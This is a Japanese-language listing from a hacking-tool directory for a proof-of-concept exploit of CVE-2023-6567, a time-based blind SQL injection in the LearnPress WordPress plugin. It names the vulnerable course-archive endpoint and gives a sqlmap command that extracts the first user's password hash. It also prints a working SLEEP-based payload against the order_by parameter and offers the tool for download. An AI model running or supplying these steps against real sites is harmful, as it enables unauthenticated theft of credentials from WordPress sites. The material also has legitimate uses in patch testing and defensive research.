Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/mimiloveexe/cve-2023-6567-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubmimiloveexe/cve-2023-6567-poc

CVE-2023-6567-poc

LearnPress WordPressプラグインの時間ベースのブラインドSQLインジェクションに対する概念実証エクスプロイト。認証されていない攻撃者がorder_byパラメータを介して機密データを抽出することを可能にします。

リポジトリを見る
2年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-6567-poc

時間ベースSQLi

説明 このプラグインは、SQL文で使用する前にorder_byパラメータを適切にサニタイズおよびエスケープしないため、認証されていないユーザーによって悪用可能なSQLインジェクションが発生します。

  1. 脆弱なGETリクエスト: https://vulnerablewordpress.com/wp-json/lp/v1/courses/archive-course?c_search=test&order_by=ID&order=DESC&limit=10&return_type=html

  2. GETリクエストを保存する

  3. sqlmap -r ~/sqli.req -p order_by --technique=T --sql-query = 'select user_pass from wp_users where id = 1'

  4. sqlmapは保存されたセッションから以下のインジェクションポイントを再開しました:


パラメータ: #1* (URI) タイプ: 時間ベースのブラインド タイトル: MySQL >= 5.0.12 AND 時間ベースのブラインド (クエリSLEEP) ペイロード: https://VULNERABLEWORDPRESS/wp-json/lp/v1/courses/archive-course?c_search=test&order_by=ID AND (SELECT 7508 FROM (SELECT(SLEEP(5)))VVvd)&order=DESC&limit=10&return_type=html

ツールをダウンロード